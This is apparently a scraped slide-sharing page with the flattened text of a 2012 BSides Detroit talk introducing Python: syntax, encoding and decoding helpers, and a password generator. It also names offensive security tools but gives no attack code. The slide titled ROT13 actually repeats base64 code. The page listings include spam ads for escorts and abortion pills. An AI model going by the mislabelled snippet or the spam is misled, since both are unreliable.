Intro to Python Workshop San Diego, CA (January 19, 2013)
Intro to Python Workshop San Diego, CA (January 19, 2013)Intro to Python Workshop San Diego, CA (January 19, 2013)
Intro to Python Workshop San Diego, CA (January 19, 2013)Kendall
 

Empfohlen

Overview of python misec - 2-2012
Overview of python misec - 2-2012Overview of python misec - 2-2012
Overview of python misec - 2-2012Tazdrumm3r
 
2016 bioinformatics i_python_part_1_wim_vancriekinge
2016 bioinformatics i_python_part_1_wim_vancriekinge2016 bioinformatics i_python_part_1_wim_vancriekinge
2016 bioinformatics i_python_part_1_wim_vancriekingeProf. Wim Van Criekinge
 
2016 bioinformatics i_python_part_2_strings_wim_vancriekinge
2016 bioinformatics i_python_part_2_strings_wim_vancriekinge2016 bioinformatics i_python_part_2_strings_wim_vancriekinge
2016 bioinformatics i_python_part_2_strings_wim_vancriekingeProf. Wim Van Criekinge
 
SWIG : An Easy to Use Tool for Integrating Scripting Languages with C and C++
SWIG : An Easy to Use Tool for Integrating Scripting Languages with C and C++SWIG : An Easy to Use Tool for Integrating Scripting Languages with C and C++
SWIG : An Easy to Use Tool for Integrating Scripting Languages with C and C++David Beazley (Dabeaz LLC)
 
Using SWIG to Control, Prototype, and Debug C Programs with Python
Using SWIG to Control, Prototype, and Debug C Programs with PythonUsing SWIG to Control, Prototype, and Debug C Programs with Python
Using SWIG to Control, Prototype, and Debug C Programs with PythonDavid Beazley (Dabeaz LLC)
 
pyconjp2015_talk_Translation of Python Program__
pyconjp2015_talk_Translation of Python Program__pyconjp2015_talk_Translation of Python Program__
pyconjp2015_talk_Translation of Python Program__Renyuan Lyu
 
Ry pyconjp2015 karaoke
Ry pyconjp2015 karaokeRy pyconjp2015 karaoke
Ry pyconjp2015 karaokeRenyuan Lyu
 
Intro to Python Workshop San Diego, CA (January 19, 2013)
Intro to Python Workshop San Diego, CA (January 19, 2013)Intro to Python Workshop San Diego, CA (January 19, 2013)
Intro to Python Workshop San Diego, CA (January 19, 2013)Kendall
 
Python Workshop
Python WorkshopPython Workshop
Python WorkshopMantavya Gajjar
 
Python for Science and Engineering: a presentation to A*STAR and the Singapor...
Python for Science and Engineering: a presentation to A*STAR and the Singapor...Python for Science and Engineering: a presentation to A*STAR and the Singapor...
Python for Science and Engineering: a presentation to A*STAR and the Singapor...pythoncharmers
 
Introduction of python
Introduction of pythonIntroduction of python
Introduction of pythonShehabAldeenFadelall
 
Random And Dynamic Images Using Python Cgi
Random And Dynamic Images Using Python CgiRandom And Dynamic Images Using Python Cgi
Random And Dynamic Images Using Python CgiAkramWaseem
 
Python 3.5: An agile, general-purpose development language.
Python 3.5: An agile, general-purpose development language.Python 3.5: An agile, general-purpose development language.
Python 3.5: An agile, general-purpose development language.Carlos Miguel Ferreira
 
Python Tools for Visual Studio: Python na Microsoftovom .NET-u
Python Tools for Visual Studio: Python na Microsoftovom .NET-uPython Tools for Visual Studio: Python na Microsoftovom .NET-u
Python Tools for Visual Studio: Python na Microsoftovom .NET-uNikola Plejic
 
JIT compilation for CPython
JIT compilation for CPythonJIT compilation for CPython
JIT compilation for CPythondelimitry
 
Intro to Python
Intro to PythonIntro to Python
Intro to PythonDaniel Greenfeld
 
Intro to Python
Intro to PythonIntro to Python
Intro to PythonOSU Open Source Lab
 
Basic Python Programming: Part 01 and Part 02
Basic Python Programming: Part 01 and Part 02Basic Python Programming: Part 01 and Part 02
Basic Python Programming: Part 01 and Part 02Fariz Darari
 
Welcome to Python
Welcome to PythonWelcome to Python
Welcome to PythonElena Williams
 
Python made easy
Python made easy Python made easy
Python made easy Abhishek kumar
 
Programming with Python - Adv.
Programming with Python - Adv.Programming with Python - Adv.
Programming with Python - Adv.Mosky Liu
 
Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...
Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...
Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...PyData
 
Python for-unix-and-linux-system-administration
Python for-unix-and-linux-system-administrationPython for-unix-and-linux-system-administration
Python for-unix-and-linux-system-administrationVictor Marcelino
 
Os Goodger
Os GoodgerOs Goodger
Os Goodgeroscon2007
 
Report om 3
Report om 3Report om 3
Report om 3HarryRoy9
 
Memory Management In Python The Basics
Memory Management In Python The BasicsMemory Management In Python The Basics
Memory Management In Python The BasicsNina Zakharenko
 
Python - the basics
Python - the basicsPython - the basics
Python - the basicsUniversity of Technology
 
Dynamic Python
Dynamic PythonDynamic Python
Dynamic PythonChui-Wen Chiu
 
Python ppt
Python pptPython ppt
Python pptMohita Pandey
 
2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx
2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx
2022-23TYBSC(CS)-Python Prog._Chapter-1.pptxsangeeta borde
 

Weitere ähnliche Inhalte

Was ist angesagt?

Python for Science and Engineering: a presentation to A*STAR and the Singapor...
Python for Science and Engineering: a presentation to A*STAR and the Singapor...Python for Science and Engineering: a presentation to A*STAR and the Singapor...
Python for Science and Engineering: a presentation to A*STAR and the Singapor...pythoncharmers
 
Random And Dynamic Images Using Python Cgi
Random And Dynamic Images Using Python CgiRandom And Dynamic Images Using Python Cgi
Random And Dynamic Images Using Python CgiAkramWaseem
 
Python 3.5: An agile, general-purpose development language.
Python 3.5: An agile, general-purpose development language.Python 3.5: An agile, general-purpose development language.
Python 3.5: An agile, general-purpose development language.Carlos Miguel Ferreira
 
Python Tools for Visual Studio: Python na Microsoftovom .NET-u
Python Tools for Visual Studio: Python na Microsoftovom .NET-uPython Tools for Visual Studio: Python na Microsoftovom .NET-u
Python Tools for Visual Studio: Python na Microsoftovom .NET-uNikola Plejic
 
JIT compilation for CPython
JIT compilation for CPythonJIT compilation for CPython
JIT compilation for CPythondelimitry
 
Basic Python Programming: Part 01 and Part 02
Basic Python Programming: Part 01 and Part 02Basic Python Programming: Part 01 and Part 02
Basic Python Programming: Part 01 and Part 02Fariz Darari
 
Programming with Python - Adv.
Programming with Python - Adv.Programming with Python - Adv.
Programming with Python - Adv.Mosky Liu
 
Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...
Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...
Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...PyData
 
Python for-unix-and-linux-system-administration
Python for-unix-and-linux-system-administrationPython for-unix-and-linux-system-administration
Python for-unix-and-linux-system-administrationVictor Marcelino
 
Memory Management In Python The Basics
Memory Management In Python The BasicsMemory Management In Python The Basics
Memory Management In Python The BasicsNina Zakharenko
 

Was ist angesagt? (20)

Python Workshop
Python WorkshopPython Workshop
Python Workshop
 
Python for Science and Engineering: a presentation to A*STAR and the Singapor...
Python for Science and Engineering: a presentation to A*STAR and the Singapor...Python for Science and Engineering: a presentation to A*STAR and the Singapor...
Python for Science and Engineering: a presentation to A*STAR and the Singapor...
 
Introduction of python
Introduction of pythonIntroduction of python
Introduction of python
 
Random And Dynamic Images Using Python Cgi
Random And Dynamic Images Using Python CgiRandom And Dynamic Images Using Python Cgi
Random And Dynamic Images Using Python Cgi
 
Python 3.5: An agile, general-purpose development language.
Python 3.5: An agile, general-purpose development language.Python 3.5: An agile, general-purpose development language.
Python 3.5: An agile, general-purpose development language.
 
Python Tools for Visual Studio: Python na Microsoftovom .NET-u
Python Tools for Visual Studio: Python na Microsoftovom .NET-uPython Tools for Visual Studio: Python na Microsoftovom .NET-u
Python Tools for Visual Studio: Python na Microsoftovom .NET-u
 
JIT compilation for CPython
JIT compilation for CPythonJIT compilation for CPython
JIT compilation for CPython
 
Intro to Python
Intro to PythonIntro to Python
Intro to Python
 
Intro to Python
Intro to PythonIntro to Python
Intro to Python
 
Basic Python Programming: Part 01 and Part 02
Basic Python Programming: Part 01 and Part 02Basic Python Programming: Part 01 and Part 02
Basic Python Programming: Part 01 and Part 02
 
Welcome to Python
Welcome to PythonWelcome to Python
Welcome to Python
 
Python made easy
Python made easy Python made easy
Python made easy
 
Programming with Python - Adv.
Programming with Python - Adv.Programming with Python - Adv.
Programming with Python - Adv.
 
Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...
Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...
Mixed-language Python/C++ debugging with Python Tools for Visual Studio- Pave...
 
Python for-unix-and-linux-system-administration
Python for-unix-and-linux-system-administrationPython for-unix-and-linux-system-administration
Python for-unix-and-linux-system-administration
 
Os Goodger
Os GoodgerOs Goodger
Os Goodger
 
Report om 3
Report om 3Report om 3
Report om 3
 
Memory Management In Python The Basics
Memory Management In Python The BasicsMemory Management In Python The Basics
Memory Management In Python The Basics
 
Python - the basics
Python - the basicsPython - the basics
Python - the basics
 
Dynamic Python
Dynamic PythonDynamic Python
Dynamic Python
 

Ähnlich wie Overview of Python - Bsides Detroit 2012

2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx
2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx
2022-23TYBSC(CS)-Python Prog._Chapter-1.pptxsangeeta borde
 
Numba: Array-oriented Python Compiler for NumPy
Numba: Array-oriented Python Compiler for NumPyNumba: Array-oriented Python Compiler for NumPy
Numba: Array-oriented Python Compiler for NumPyTravis Oliphant
 
Tutorial on-python-programming
Tutorial on-python-programmingTutorial on-python-programming
Tutorial on-python-programmingChetan Giridhar
 
Python for Security Professionals
Python for Security ProfessionalsPython for Security Professionals
Python for Security ProfessionalsAditya Shankar
 
Python高级编程(二)
Python高级编程(二)Python高级编程(二)
Python高级编程(二)Qiangning Hong
 
Pycon taiwan 2018_claudiu_popa
Pycon taiwan 2018_claudiu_popaPycon taiwan 2018_claudiu_popa
Pycon taiwan 2018_claudiu_popaClaudiu Popa
 
Cs4hs2008 track a-programming
Cs4hs2008 track a-programmingCs4hs2008 track a-programming
Cs4hs2008 track a-programmingRashi Agarwal
 
Lecture1_cis4930.pdf
Lecture1_cis4930.pdfLecture1_cis4930.pdf
Lecture1_cis4930.pdfzertash1
 
PPT on Python - illustrating Python for BBA, B.Tech
PPT on Python - illustrating Python for BBA, B.TechPPT on Python - illustrating Python for BBA, B.Tech
PPT on Python - illustrating Python for BBA, B.Techssuser2678ab
 
An Intro to Python in 30 minutes
An Intro to Python in 30 minutesAn Intro to Python in 30 minutes
An Intro to Python in 30 minutesSumit Raj
 
web programming UNIT VIII python by Bhavsingh Maloth
web programming UNIT VIII python by Bhavsingh Malothweb programming UNIT VIII python by Bhavsingh Maloth
web programming UNIT VIII python by Bhavsingh MalothBhavsingh Maloth
 
Learning python
Learning pythonLearning python
Learning pythonFraboni Ec
 

Ähnlich wie Overview of Python - Bsides Detroit 2012 (20)

Python ppt
Python pptPython ppt
Python ppt
 
2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx
2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx
2022-23TYBSC(CS)-Python Prog._Chapter-1.pptx
 
Intro
IntroIntro
Intro
 
Numba: Array-oriented Python Compiler for NumPy
Numba: Array-oriented Python Compiler for NumPyNumba: Array-oriented Python Compiler for NumPy
Numba: Array-oriented Python Compiler for NumPy
 
Tutorial on-python-programming
Tutorial on-python-programmingTutorial on-python-programming
Tutorial on-python-programming
 
Python
PythonPython
Python
 
Python for Security Professionals
Python for Security ProfessionalsPython for Security Professionals
Python for Security Professionals
 
Python高级编程(二)
Python高级编程(二)Python高级编程(二)
Python高级编程(二)
 
Python
PythonPython
Python
 
Pycon taiwan 2018_claudiu_popa
Pycon taiwan 2018_claudiu_popaPycon taiwan 2018_claudiu_popa
Pycon taiwan 2018_claudiu_popa
 
Cs4hs2008 track a-programming
Cs4hs2008 track a-programmingCs4hs2008 track a-programming
Cs4hs2008 track a-programming
 
Python course
Python coursePython course
Python course
 
PYTHON
PYTHONPYTHON
PYTHON
 
Lecture1_cis4930.pdf
Lecture1_cis4930.pdfLecture1_cis4930.pdf
Lecture1_cis4930.pdf
 
PPT on Python - illustrating Python for BBA, B.Tech
PPT on Python - illustrating Python for BBA, B.TechPPT on Python - illustrating Python for BBA, B.Tech
PPT on Python - illustrating Python for BBA, B.Tech
 
An Intro to Python in 30 minutes
An Intro to Python in 30 minutesAn Intro to Python in 30 minutes
An Intro to Python in 30 minutes
 
web programming UNIT VIII python by Bhavsingh Maloth
web programming UNIT VIII python by Bhavsingh Malothweb programming UNIT VIII python by Bhavsingh Maloth
web programming UNIT VIII python by Bhavsingh Maloth
 
Learning python
Learning pythonLearning python
Learning python
 
Learning python
Learning pythonLearning python
Learning python
 
Learning python
Learning pythonLearning python
Learning python
 

Kürzlich hochgeladen

Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityWSO2
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 

Kürzlich hochgeladen (20)

Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 

Overview of Python - Bsides Detroit 2012

  • 2.
  • 3. Overview of Python Flying made simple without the Nyquil hangover Keith Dixon @Tazdrumm3r
  • 4. Agenda • About me • About Python • Python basics • Python’s uses • Coding for Penetration Testers book • Tips, tricks, observations • Resources
  • 5. About me Who am I? • Husband/father/geek/gets distracted by shiny objects easy • Career path switched to IT in 1999, professionally in IT since 2001 – Learning, studying, and currently interviewing for infosec professional roles • Vbscript – 2007 • Python – 2011
  • 6. About Python • Conceived in the late 1980’s by Guido van Rossum at CWI. • Python 2.0 was release on October 16th, 2000 • Python 3.0 was released on December 2008
  • 7. What is Python good for? • Python comes with a large standard library that covers areas such as; • string processing • Internet protocols • software engineering • operating system interfaces • Artificial intelligence (because of similarities to Lisp)
  • 8. What is Python good for? Extensive use in the information security industry • Exploit development • Network • Debugging • Reverse engineering • fuzzing, • Web • Forensics • Malware analysis • PDF
  • 9. What is Python good for? • Easy to write short scripts for system admin work. • Python code is easy to understand. • Once the basic syntax is learned, even the most complicated scripts can make sense.
  • 10. What is Python good for? • Python is cross platform!! • It will work on Linux, Windows, Mac and most every other OS. • Many, many resources and a big, friendly community
  • 11. Python tools • Social-Engineer Toolkit - specifically designed to perform advanced attacks against the human element. • Artillery - a honeypot/monitoring/prevention tool used to protect Linux-based systems. • Fast-Track - aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. • Scapy - send, sniff and dissect and forge network packets. Usable interactively or as a library • Pytbull - flexible IDS/IPS testing framework (shipped with more than 300 tests) • Scrapy - a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages • W3af - a Web Application Attack and Audit Framework.
  • 12. Inspiration for the idea? (Part 1)
  • 13. Inspiration for the idea? (Part 2) Post CSAW CTF
  • 14.
  • 15. Python 101 • Indentation does matter This will work startNumber = int(raw_input("Enter the start number here ")) endNumber = int(raw_input("Enter the end number here ")) def fib(n): if n < 2: return n return fib(n-2) + fib(n-1) print map(fib, range(startNumber, endNumber)) But this won’t… startNumber = int(raw_input("Enter the start number here ")) endNumber = int(raw_input("Enter the end number here ")) def fib(n): if n < 2: return n return fib(n-2) + fib(n-1) print map(fib, range(startNumber, endNumber))
  • 16. Python 101 • All scripts are considered Entire module Partial method modules >>> import sys >>> from sys import argv • All functions inside module can be used or only certain methods can be used inside script • Help is built in Help on modules Help on methods >>> Import sys, hashlib >>> Import sys, hashlib >>> help(sys) >>> help(sys.argv) >>> help(hashlib) >>> help(hashlib.sha512) keith@dw ~$ pydoc sys keith@dw ~$ pydoc sys.argv keith@dw ~$ pydoc hashlib keith@dw ~$ pydoc hashlib.sha512
  • 17. Python 101 • It can be ran interactively Via command prompt Via shell keith@dw ~ $ python • IDLE • DreamPie Python 2.72 • Ipython Type “help”, “copyright”.. >>> Windows Linux • Scripts File extensions File extensions (optional) • *.py – Python script • *.py – Python script • *pyc – Compiled Python file • *pyc – Compiled Python file (generated by running script) (generated by running script) Running scripts Running scripts • .py file extension associated with • Must have #!/usr/bin/python (path python.exe to python) at the top of the script • Should have #!/usr/bin/python at • If you’re running it from the the top of the script in case you terminal, the script must be want to run it on Linux chmod’ed to make it executable or • If the path to the interpreter is in you can call python and the script your system path, you can name… doubleclick script to run, keith@dw ~ $ python password.py otherwise… C:UsersKeith>python password.py
  • 18. Python 102 • Data types Numbers String List (mutable) Tuple (non mutable) A = 10 A = ‘This is a string’ list = *‘abc’, 45, ‘The list = (‘abc’, 45, ‘The B = 0100 or B = 0x41 Avengers’, 0x67, ‘def’, Avengers’, 0x67, or B = 0b1000000 print A 15.5] ‘def’, 15.5) C = 3.56 print A[0] D = 3.16j print A[3:6] print list print list print A[4:] print list [0] print list [0] • Integers print A * 2 print list [1:3] print list [1:3] • Long integers print A + “ and this is print list[2:] print list[2:] (octal, hex, how it prints” list.append*“Detroit”+ list.append(“Detroit”) binary) • Float 'This is a string' list = *‘abc’, 45, ‘The AttributeError: 'tuple' • complex ‘T’ Avengers’, 0x67, ‘def’, object has no ‘s i’ 15.5,’Detroit’+ attribute 'append’ ‘ is a string’ • Conditional If statement Else statement Elif statement statements if x = true: if x = 1: if expression1: print true print “1” statement(s) else: elif expression2: print “not 1” statement(s) else: statement(s)
  • 19. Python 102 • Looping While loop For loop Loop control count = 0 code1 = (sys.argv[1]) count = 0 while (count < 9): code_split = code1.split(':') while (count < 9): print 'The count is:', count print 'The count is:', count count = count + 1 for i in code_split: count = count + 1 code1a = int(i) if count = 7: print "Good bye!" codefinal = chr(code1a) break sys.stdout.write(codefinal) print "Good bye!" • Functions Creating a function In use def base64_decode(base64_key): >>>csaw.base64_decode(‘V2VsY29tZSB0byBCc2lkZXMgRG answer=base64_key.decode('base64','strict') V0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnl print answer hbiwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yI GFsbCB0aGUgaGFyZCB3b3JrIHRoZXkgZGlkIHRvIG1ha2Ugd GhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ==‘) >>> Welcome to Bsides Detroit 2012. Make sure to thank Ryan, Steven, Wolfgang, and Kyle for all the hard work they did to make this year such a success!
  • 20. Python 102 Open a file for reading Write to a file • Files #!/usr/bin/python #!/usr/bin/python f = open ('base64.txt', 'r') import sys file = f.read() if len(sys.argv)<2: answer=file.decode('base64','strict') sys.exit("Usage " + sys.argv[0] + " <Base64 code you wish to decode>n") print answer basecode = sys.argv[1] answer=basecode.decode('base64','strict') f.close ( ) print answer fo = open("base64.txt", "w") fo.write(answer) fo.close() • Input/output raw_input input #!/usr/bin/python #!/usr/bin/python str = raw_input("Enter your input: "); str = input("Enter your input: "); print "Received input is : ", str print "Received input is : ", str Input is  Thanks for coming to Bsides Input is  5 * 5 Output is  Received input is : Thanks for coming to Output is  25 Bsides
  • 21. Python’s uses – General scripting • Cryptography • Password creation • Use files (write to/read from)
  • 22. Cryptography Encode Base64 code #!/usr/bin/python code = raw_input("Enter the data you wish to be encoded to Base64") answer=code.encode('base64','strict') print answer Encode ROT13 code #!/usr/bin/python code = raw_input("Enter the data you wish to be encoded to Base64") answer=code.encode('base64','strict') print answer
  • 23. Decrypt module #!/usr/bin/python import sys def hexdecode(hex_key): import binascii hex_split = hex_key.split(':') for decode in hex_split: hex_decode = binascii.a2b_hex(decode) sys.stdout.write(hex_decode) def uni_decode(unicode_key): unicode_split=unicode_key.split(':') for i in unicode_split: code1a = int(i) codefinal = chr(code1a) sys.stdout.write(codefinal) def base64_decode(base64_key): answer=base64_key.decode('base64','strict') print answer def binary_decode(binary_key): import math f = lambda v, l: [v[i*l:(i+1)*l] for i in range(int(math.ceil(len(v)/float(l))))] basecode = f (binary_key,8) for code in basecode: x = (code) decodea = int(code,2) decodeb = chr(decodea) sys.stdout.write(decodeb) def rot13_decode(rot13_key): answer=rot13_key.decode('rot13','strict') print answer
  • 26. Password creation ##Author: ATC ##Please score this on activestate import string, random print "How many characters would you like the password to have?" print "Must be nine or more" length = input () password_len = length password = [] for group in (string.ascii_letters, string.punctuation, string.digits): password += random.sample(group, 3) password += random.sample( string.ascii_letters + string.punctuation + string.digits, password_len - len(password)) random.shuffle(password) password = ''.join(password) print password http://code.activestate.com/recipes/577905-password-generator/
  • 27. Use files (write to/read from) Read from a file #!/usr/bin/python f = open ('base64.txt', 'r') file = f.read() answer=file.decode('base64','strict') f.close ( ) Write to a file #!/usr/bin/python code = raw_input("Enter the data you wish to be encoded to Base64") answer=code.encode('base64','strict') f=open('base64.txt','w') line=f.write(answer) f.close ( )
